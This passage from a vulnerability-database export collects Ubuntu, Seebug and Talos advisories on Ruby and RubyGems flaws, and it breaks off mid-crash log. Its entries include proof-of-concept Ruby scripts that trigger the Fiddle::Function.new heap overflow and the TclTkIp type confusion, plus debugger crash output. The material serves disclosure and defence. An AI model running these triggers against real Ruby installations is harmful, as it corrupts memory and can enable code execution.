"cpe:2.3:a:rubygems:rubygems:2.0.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.0.0:*:*:*:*:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-06-28T14:34:03", "description": "An exploitable heap overflow vulnerability exists in the\nFiddle::Function.new \"initialize\" function functionality of Ruby. In\nFiddle::Function.new \"initialize\" heap buffer \"arg_types\" allocation is\nmade based on args array length. Specially constructed object passed as\nelement of args array can increase this array size after mentioned\nallocation and cause heap overflow.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=851161>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | 2.3.0 and later not affected\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2339", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2339"], "modified": "2017-01-06T00:00:00", "id": "UB:CVE-2016-2339", "href": "https://ubuntu.com/security/CVE-2016-2339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-28T14:34:04", "description": "Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker\npassing different type of object than String as \"retval\" argument can cause\narbitrary code execution.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=851161>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | 2.3.0 and later not affected\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2337", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2016-2337"], "modified": "2017-01-06T00:00:00", "id": "UB:CVE-2016-2337", "href": "https://ubuntu.com/security/CVE-2016-2337", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-17T16:01:46", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7\ndoes not validate the hostname when fetching gems or making API requests,\nwhich allows remote attackers to redirect requests to arbitrary domains via\na crafted DNS SRV record, aka a \"DNS hijack attack.\"\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=790111>\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=790119>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | rubygems is for users of ruby1.8. ruby1.9.1 and jruby ship an embedded rubygems. \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | I have doubts this patch actually addresses DNS hijacking adequately; this may properly restrict SRV records, but what verifies subsequent lookups to ensure the returned IPs aren't under attacker control? 
Marking 'low' as a result.\n", "cvss3": {}, "published": "2015-06-24T00:00:00", "type": "ubuntucve", "title": "CVE-2015-3900", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-06-24T00:00:00", "id": "UB:CVE-2015-3900", "href": "https://ubuntu.com/security/CVE-2015-3900", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-17T15:47:56", "description": "RubyGems 2.0.x before 2.0.17, 2.2.x before 2.2.5, and 2.4.x before 2.4.8\ndoes not validate the hostname when fetching gems or making API requests,\nwhich allows remote attackers to redirect requests to arbitrary domains via\na crafted DNS SRV record with a domain that is suffixed with the original\ndomain name, aka a \"DNS hijack attack.\" NOTE: this vulnerability exists\nbecause of an incomplete fix for CVE-2015-3900.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | rubygems is for users of ruby1.8. 
ruby1.9.1 and jruby ship an embedded rubygems.\n", "cvss3": {}, "published": "2015-08-25T00:00:00", "type": "ubuntucve", "title": "CVE-2015-4020", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2015-08-25T00:00:00", "id": "UB:CVE-2015-4020", "href": "https://ubuntu.com/security/CVE-2015-4020", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "seebug": [{"lastseen": "2017-11-19T11:56:07", "description": "### DESCRIPTION\r\nType Confusion exists in _cancel_eval Ruby's TclTkIp class method. 
Attacker passing different type of object than String as \"retval\" argument can cause arbitrary code execution.\r\n\r\n### TESTED VERSIONS\r\nRuby 2.3.0 dev Ruby 2.2.2 Tcl/Tk8.6 or later\r\n\r\n### PRODUCT URLs\r\nhttps://www.ruby-lang.org\r\n\r\n### DETAILS\r\nVulnerable code:\r\n```\r\n---------------------------------------------- code \r\n--------------------------------------------- \r\nLine 7761 static VALUE\r\nLine 7762 ip_cancel_eval(argc, argv, self)\r\nLine 7763 int argc;\r\nLine 7764 VALUE *argv;\r\nLine 7765 VALUE self;\r\nLine 7766 {\r\nLine 7767 VALUE retval;\r\nLine 7768\r\nLine 7769 if (rb_scan_args(argc, argv, \"01\", &retval) == 0) {\r\nLine 7770 retval = Qnil;\r\nLine 7771 }\r\nLine 7772 if (ip_cancel_eval_core(get_ip(self)->ip, retval, 0) == \r\nTCL_OK) {\r\nLine 7773 return Qtrue;\r\nLine 7774 } else {\r\nLine 7775 return Qfalse;\r\nLine 7776 }\r\nLine 7777 }\r\n\r\nLine 7736 static int\r\nLine 7737 ip_cancel_eval_core(interp, msg, flag)\r\nLine 7738 Tcl_Interp *interp;\r\nLine 7739 VALUE msg;\r\nLine 7740 int flag;\r\nLine 7741 {\r\nLine 7742 #if TCL_MAJOR_VERSION < 8 || (TCL_MAJOR_VERSION == 8 && \r\nTCL_MINOR_VERSION < 6)\r\nLine 7743 rb_raise(rb_eNotImpError,\r\nLine 7744 \"cancel_eval is supported Tcl/Tk8.6 or \r\nlater.\");\r\nLine 7745\r\nLine 7746 UNREACHABLE;\r\nLine 7747 #else\r\nLine 7748 Tcl_Obj *msg_obj;\r\nLine 7749\r\nLine 7750 if (NIL_P(msg)) {\r\nLine 7751 msg_obj = NULL;\r\nLine 7752 } else {\r\nLine 7753 msg_obj = Tcl_NewStringObj(RSTRING_PTR(msg), \r\nRSTRING_LEN(msg));\r\nLine 7754 Tcl_IncrRefCount(msg_obj);\r\nLine 7755 }\r\nLine 7756\r\nLine 7757 return Tcl_CancelEval(interp, msg_obj, 0, flag);\r\nLine 7758 #endif\r\nLine 7759 }\r\n---------------------------------------------- code \r\n--------------------------------------------- \r\n```\r\n\r\nIn line 7769 the \"_cancel_eval\" method argument is parsed out into the \"retval\" variable. Next, this variable is passed to the \"ip_cancel_eval_core\" function (line 7772). 
In line 7753 we can see that our \"retval\" variable, which in this function is passed as the \"msg\" argument, is treated as a String object. Passing an object other than a String causes a type confusion vulnerability in this line.\r\n\r\n\r\n### TIMELINE\r\n* 2015-06-18 - Initial Discovery \r\n* 2015-06-30 - Vendor Notification \r\n* 2016-06-14 - Public Disclosure", "cvss3": {}, "published": "2017-10-20T00:00:00", "type": "seebug", "title": "Ruby TclTkIp ip_cancel_eval Type Confusion Vulnerabilities(CVE-2016-2337)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2337"], "modified": "2017-10-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96756", "id": "SSV:96756", "sourceData": "\n require 'tk'\r\nt = TclTkIp.new()\r\nt._cancel_eval(0x11223344)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96756", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T11:56:06", "description": "### DESCRIPTION\r\nAn exploitable heap overflow vulnerability exists in the Fiddle::Function.new \"initialize\" function functionality of Ruby. In Fiddle::Function.new \"initialize\" heap buffer \"arg_types\" allocation is made based on args array length. 
Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.\r\n\r\n### TESTED VERSIONS\r\nRuby 2.3.0 dev Ruby 2.2.2\r\n\r\n### PRODUCT URLs\r\nhttps://www.ruby-lang.org\r\n\r\n### DETAILS\r\n```\r\nLine 86 static VALUE\r\nLine 87 initialize(int argc, VALUE argv[], VALUE self)\r\nLine 88 {\r\nLine 89 ffi_cif * cif;\r\nLine 90 ffi_type **arg_types;\r\nLine 91 ffi_status result;\r\nLine 92 VALUE ptr, args, ret_type, abi, kwds;\r\nLine 93 int i;\r\nLine 94 \r\nLine 95 rb_scan_args(argc, argv, \"31:\", &ptr, &args, &ret_type, &abi, \r\n&kwds);\r\nLine 96 if(NIL_P(abi)) abi = INT2NUM(FFI_DEFAULT_ABI);\r\nLine 97 \r\nLine 98 Check_Type(args, T_ARRAY);\r\nLine 99 Check_Max_Args(\"args\", RARRAY_LENINT(args));\r\n\r\n (...)\r\n\r\nLine 110 arg_types = xcalloc(RARRAY_LEN(args) + 1, sizeof(ffi_type *));\r\nLine 111\r\nLine 112 for (i = 0; i < RARRAY_LEN(args); i++) {\r\nLine 113 int type = NUM2INT(RARRAY_PTR(args)[i]);\r\nLine 114 arg_types[i] = INT2FFI_TYPE(type);\r\nLine 115 }\r\nLine 116 arg_types[RARRAY_LEN(args)] = NULL;\r\n```\r\n\r\nIn Line 110, based on the length of the args array passed by the user, xcalloc allocates a buffer for ffi_type structures. Later, in the for loop, we see that each element of this array is first converted to int and then to an ffi_type structure. The results of these conversions are stored in the previously allocated array \"arg_types\".\r\n\r\nExploiting the knowledge that in Line 113 NUM2INT will call the \"to_int\" method on a non-Integer object, we can create a properly constructed object which will implement this method, and whose responsibility will be to increase the size of the args array. 
Increasing the size of the args array inside the for loop, just after space has been allocated for arg_types, causes a heap overflow in Line 114 during the next iteration, and later in Line 116, when further ffi_type structures are stored.\r\n\r\n### CRASH ANALYSIS\r\n```\r\n(15dc.16b8): Break instruction exception - code 80000003 (first chance)\r\neax=00000000 ebx=00000000 ecx=bf8d0000 edx=0008e3c8 esi=fffffffe edi=00000000\r\neip=77b612fb esp=0028fb08 ebp=0028fb34 iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\r\nntdll!LdrpDoDebuggerBreak+0x2c:\r\n77b612fb cc int 3\r\n0:000> bu fiddle!Init_fiddle\r\n0:000> g\r\nModLoad: 75dc0000 75e20000 C:\\Windows\\SysWOW64\\IMM32.DLL\r\nModLoad: 75ce0000 75dac000 C:\\Windows\\syswow64\\MSCTF.dll\r\nModLoad: 72b10000 72b3b000 C:\\Windows\\SysWOW64\\nvinit.dll\r\nModLoad: 72b00000 72b09000 C:\\Windows\\SysWOW64\\VERSION.dll\r\nModLoad: 0f000000 0f006000 C:\\Program Files (x86)\\NVIDIA \r\nCorporation\\CoProcManager\\detoured.dll\r\nModLoad: 6e480000 6e4a9000 C:\\Program Files (x86)\\NVIDIA \r\nCorporation\\CoProcManager\\nvd3d9wrap.dll\r\nModLoad: 76740000 768dd000 C:\\Windows\\syswow64\\SETUPAPI.dll\r\nModLoad: 765a0000 765c7000 C:\\Windows\\syswow64\\CFGMGR32.dll\r\nModLoad: 762c0000 7634f000 C:\\Windows\\syswow64\\OLEAUT32.dll\r\nModLoad: 76440000 7659c000 C:\\Windows\\syswow64\\ole32.dll\r\nModLoad: 75490000 754a2000 C:\\Windows\\syswow64\\DEVOBJ.dll\r\nModLoad: 6e460000 6e47e000 C:\\Program Files (x86)\\NVIDIA \r\nCorporation\\CoProcManager\\nvdxgiwrap.dll\r\nModLoad: 72a90000 72aa7000 C:\\Windows\\SysWOW64\\CRYPTSP.dll\r\nModLoad: 72a50000 72a8b000 C:\\Windows\\SysWOW64\\rsaenh.dll\r\nModLoad: 71280000 7128c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\enc\\encdb.so\r\nModLoad: 6dd40000 6dd4c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386- \r\nmingw32\\enc\\trans\\transdb.so\r\nModLoad: 6fbc0000 6fbcb000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\enc\\iso_8859_2.so\r\nModLoad: 70b40000 70b4c000 
C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\thread.so\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \r\n\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\fiddle.so -\r\nModLoad: 70a40000 70a50000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\fiddle.so\r\nModLoad: 6b740000 6b76a000 C:\\Ruby22\\bin\\libffi-6.dll\r\nBreakpoint 0 hit\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \r\n\\Ruby22\\bin\\msvcrt-ruby220.dll -\r\neax=70a42270 ebx=70a4b068 ecx=70a40000 edx=70a40000 esi=70a4b4ed edi=64105061\r\neip=70a42270 esp=0028ee5c ebp=0028f2d8 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\r\nfiddle!Init_fiddle:\r\n70a42270 55 push ebp\r\n0:000> bp 70A42ADD \".printf \\\" xcalloc( 0x%x )\\\",edx;.echo;g \"\r\n0:000> bp 70A42AE2 \".printf \\\"arg_types addr : 0x%x\\\",eax;.echo\"\r\n0:000> g\r\n\r\nStart\r\nargs array size : 1\r\n xcalloc( 0x2 )\r\narg_types addr : 0x2b81b50\r\n\r\neax=02b81b50 ebx=00000000 ecx=75e2f489 edx=00000018 esi=00000003 edi=0035003c\r\neip=70a42ae2 esp=0028f7a0 ebp=0028f808 iopl=0 nv up ei pl nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206\r\nfiddle!Init_fiddle+0x872:\r\n70a42ae2 89c7 mov edi,eax\r\n0:000> !heap -p -a 0x2b81b50\r\n address 02b81b50 found in\r\n _HEAP @ 510000\r\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\r\n 02b81b48 0004 0000 [00] 02b81b50 00008 - (busy)\r\n\r\n\r\n0:000> !heap -p -a 02b81b48+20 \r\n address 02b81b68 found in\r\n _HEAP @ 510000\r\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\r\n 02b81b68 0290 0000 [00] 02b81b70 01478 - (free)\r\n\r\n\r\n0:000> dd 02b81b48+20\r\n02b81b68 fad1ca73 000ae511 005100c4 00514668\r\n02b81b78 feeefeee feeefeee feeefeee feeefeee\r\n02b81b88 feeefeee feeefeee feeefeee feeefeee\r\n02b81b98 feeefeee feeefeee feeefeee feeefeee\r\n02b81ba8 feeefeee feeefeee feeefeee feeefeee\r\n02b81bb8 feeefeee feeefeee feeefeee feeefeee\r\n02b81bc8 feeefeee 
feeefeee feeefeee feeefeee\r\n02b81bd8 feeefeee feeefeee feeefeee feeefeee\r\n0:000> g\r\n\r\nincrease size of array\r\nNew args array size is : 11\r\n\r\nHEAP[ruby.exe]: Heap block at 02B81B48 modified at 02B81B58 past requested size of 8\r\n(15dc.16b8): Break instruction exception - code 80000003 (first chance)\r\neax=02b81b48 ebx=02b81b58 ecx=77b2f861 edx=0028f969 esi=02b81b48 edi=00000008\r\neip=77b9087c esp=0028fbb0 ebp=0028fbb0 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\r\nntdll!RtlpBreakPointHeap+0x23:\r\n77b9087c cc int 3\r\n0:000> !heap -p -a 02b81b48+20\r\n address 02b81b68 found in\r\n _HEAP @ 510000\r\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\r\n 02b81b68 b8ab 0000 [00] 02b81b70 4c66a - (busy)\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \r\n\\Ruby22\\bin\\libffi-6.dll -\r\n libffi_6!ffi_type_pointer\r\n\r\n\r\n0:000> !heap -x 02b81b48+20\r\nERROR: Block 02b81b68 previous size 955d does not match previous block size 4\r\nHEAP 00510000 (Seg 02af0000) At 02b81b68 Error: invalid block Previous\r\n\r\n0:000> dd 02b81b48+20\r\n02b81b68 6b747048 6b747048 6b747048 6b747048\r\n02b81b78 6b747048 00000000 00000003 00000003\r\n02b81b88 00000003 00000003 00000003 00000003\r\n02b81b98 00000003 baadf00d baadf00d baadf00d\r\n02b81ba8 baadf00d baadf00d baadf00d baadf00d\r\n02b81bb8 baadf00d baadf00d abababab abababab\r\n02b81bc8 00000000 00000000 66d2c8ee 180ae518\r\n02b81bd8 02b6c4d0 02b6c4d0 02b6c4d0 02b6c4d0\r\n0:000> g\r\nHEAP[ruby.exe]: Invalid address specified to RtlSizeHeap( 00510000, 02B81B50 )\r\n(15dc.16b8): Break instruction exception - code 80000003 (first chance)\r\neax=02b81b48 ebx=02b81b48 ecx=77b2f861 edx=0028f985 esi=00510000 edi=02b81b50\r\neip=77b9087c esp=0028fbcc ebp=0028fbcc iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\r\nntdll!RtlpBreakPointHeap+0x23:\r\n77b9087c cc int 3\r\n0:000> 
g\r\nHEAP[ruby.exe]: Heap block at 02B81B48 modified at 02B81B58 past requested size of 8\r\n(15dc.16b8): Break instruction exception - code 80000003 (first chance)\r\neax=02b81b48 ebx=02b81b58 ecx=77b2f861 edx=0028f871 esi=02b81b48 edi=00000008\r\neip=77b9087c esp=0028fab8 ebp=0028fab8 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\r\nntdll!RtlpBreakPointHeap+0x23:\r\n77b9087c cc int 3\r\n0:000> g\r\nHEAP[ruby.exe]: Invalid address specified to RtlFreeHeap( 00510000, 02B81B50 )\r\n(15dc.16b8): Break instruction exception - code 80000003 (first chance)\r\neax=02b81b48 ebx=02b81b48 ecx=77b2f861 edx=0028f88d esi=00510000 edi=00510000\r\neip=77b9087c esp=0028fad4 ebp=0028fad4 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\r\nntdll!RtlpBreakPointHeap+0x23:\r\n77b9087c cc int 3\r\n0:000> g\r\neax=00000000 ebx=00000000 ecx=0028f88c edx=0028f88d esi=77bc2100 edi=77bc20c0\r\neip=77adfd0e esp=0028fe40 ebp=0028fe5c iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\r\nntdll!ZwTerminateProcess+0x12:\r\n77adfd0e 83c404 add esp,4\r\n0:000>\r\n```\r\n\r\n### TIMELINE\r\n* 2015-06-11 - Initial Discovery \r\n* 2015-06-30 - Vendor Notification \r\n* 2016-06-14 - Public Disclosure", "cvss3": {}, "published": "2017-10-20T00:00:00", "type": "seebug", "title": "Ruby Fiddle::Function.new Heap Overflow Vulnerability(CVE-2016-2339)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2339"], "modified": "2017-10-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96759", "id": "SSV:96759", "sourceData": "\n require 'fiddle'\r\n\r\n$args = []\r\nclass MyObject \r\n def to_int\r\n puts \"increase size of array\"\r\n (1..10).map{|x| $args.push(1)}\r\n puts \"New args array size is : #{$args.length}\" \r\n return 1\r\n end\r\nend\r\nputs \"Start\"\r\nx = MyObject.new\r\n$args.push(x)\r\nputs \"args array size : #{$args.length}\"\r\nf = 
Fiddle::Function.new(nil, $args, Fiddle::TYPE_VOIDP)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96759", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talos": [{"lastseen": "2023-06-03T15:23:57", "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0034\n\n## Ruby Fiddle::Function.new Heap Overflow Vulnerability\n\n##### June 14, 2016\n\n##### CVE Number\n\nCVE-2016-2339\n\n### DESCRIPTION\n\nAn exploitable heap overflow vulnerability exists in the Fiddle::Function.new \u201cinitialize\u201d function functionality of Ruby. In Fiddle::Function.new \u201cinitialize\u201d heap buffer \u201carg_types\u201d allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.\n\n### TESTED VERSIONS\n\nRuby 2.3.0 dev Ruby 2.2.2\n\n### PRODUCT URLs\n\nhttps://www.ruby-lang.org\n\n### DETAILS\n \n \n Line 86 \tstatic VALUE\n Line 87 \tinitialize(int argc, VALUE argv[], VALUE self)\n Line 88 \t{\n Line 89 \t\tffi_cif * cif;\n Line 90 \t\tffi_type **arg_types;\n Line 91 \t\tffi_status result;\n Line 92 \t\tVALUE ptr, args, ret_type, abi, kwds;\n Line 93 \t\tint i;\n Line 94 \n Line 95 \t\trb_scan_args(argc, argv, \"31:\", &ptr, &args, &ret_type, &abi, \n &kwds);\n Line 96 \t\tif(NIL_P(abi)) abi = INT2NUM(FFI_DEFAULT_ABI);\n Line 97 \n Line 98 \t\tCheck_Type(args, T_ARRAY);\n Line 99 \t\tCheck_Max_Args(\"args\", RARRAY_LENINT(args));\n \t\n \t\t\t(...)\n \t\n Line 110\t\targ_types = xcalloc(RARRAY_LEN(args) + 1, sizeof(ffi_type *));\n Line 111\n Line 112\t\tfor (i = 0; i < RARRAY_LEN(args); i++) {\n Line 113\t\t\tint type = NUM2INT(RARRAY_PTR(args)[i]);\n Line 114\t\t\targ_types[i] = INT2FFI_TYPE(type);\n Line 115\t\t}\n Line 116\t\targ_types[RARRAY_LEN(args)] = NULL;\n \n\nIn Line 110 based on length of passed by user args array, xcalloc allocates buffer for ffi_type structures. 
Later, in the for loop, each element of this array is first converted to int and then to an ffi_type structure. The results of these conversions are stored in the previously allocated array \u201carg_types\u201d. Because NUM2INT in Line 113 calls the \u201cto_int\u201d method on a non-Integer object, a specially constructed object can implement this method so that it increases the size of the args array. Growing the args array inside the for loop, just after the space for arg_types has been allocated, causes a heap overflow on the next iteration in Line 114, and later in Line 116, when further ffi_type structures are stored.\n\n### POC\n \n \n require 'fiddle'\n \n $args = []\n class MyObject\t\n def to_int\n \t puts \"increase size of array\"\n \t (1..10).map{|x| $args.push(1)}\n \t puts \"New args array size is : #{$args.length}\"\t\t\n \t return 1\n end\n end\n puts \"Start\"\n x = MyObject.new\n $args.push(x)\n puts \"args array size : #{$args.length}\"\n f = Fiddle::Function.new(nil, $args, Fiddle::TYPE_VOIDP)\n \n\n### CRASH ANALYSIS\n \n \n (15dc.16b8): Break instruction exception - code 80000003 (first chance)\n eax=00000000 ebx=00000000 ecx=bf8d0000 edx=0008e3c8 esi=fffffffe edi=00000000\n eip=77b612fb esp=0028fb08 ebp=0028fb34 iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\n ntdll!LdrpDoDebuggerBreak+0x2c:\n 77b612fb cc int 3\n 0:000> bu fiddle!Init_fiddle\n 0:000> g\n ModLoad: 75dc0000 75e20000 C:\\Windows\\SysWOW64\\IMM32.DLL\n ModLoad: 75ce0000 75dac000 C:\\Windows\\syswow64\\MSCTF.dll\n ModLoad: 72b10000 72b3b000 C:\\Windows\\SysWOW64\\nvinit.dll\n ModLoad: 72b00000 72b09000 C:\\Windows\\SysWOW64\\VERSION.dll\n ModLoad: 0f000000 0f006000 C:\\Program Files (x86)\\NVIDIA \n Corporation\\CoProcManager\\detoured.dll\n ModLoad: 6e480000 6e4a9000 C:\\Program Files (x86)\\NVIDIA \n Corporation\\CoProcManager\\nvd3d9wrap.dll\n ModLoad: 76740000 768dd000 
C:\\Windows\\syswow64\\SETUPAPI.dll\n ModLoad: 765a0000 765c7000 C:\\Windows\\syswow64\\CFGMGR32.dll\n ModLoad: 762c0000 7634f000 C:\\Windows\\syswow64\\OLEAUT32.dll\n ModLoad: 76440000 7659c000 C:\\Windows\\syswow64\\ole32.dll\n ModLoad: 75490000 754a2000 C:\\Windows\\syswow64\\DEVOBJ.dll\n ModLoad: 6e460000 6e47e000 C:\\Program Files (x86)\\NVIDIA \n Corporation\\CoProcManager\\nvdxgiwrap.dll\n ModLoad: 72a90000 72aa7000 C:\\Windows\\SysWOW64\\CRYPTSP.dll\n ModLoad: 72a50000 72a8b000 C:\\Windows\\SysWOW64\\rsaenh.dll\n ModLoad: 71280000 7128c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\enc\\encdb.so\n ModLoad: 6dd40000 6dd4c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386- \n mingw32\\enc\\trans\\transdb.so\n ModLoad: 6fbc0000 6fbcb000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\enc\\iso_8859_2.so\n ModLoad: 70b40000 70b4c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\thread.so\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \n \\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\fiddle.so -\n ModLoad: 70a40000 70a50000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\fiddle.so\n ModLoad: 6b740000 6b76a000 C:\\Ruby22\\bin\\libffi-6.dll\n Breakpoint 0 hit\n *** ERROR: Symbol file could not be found. 
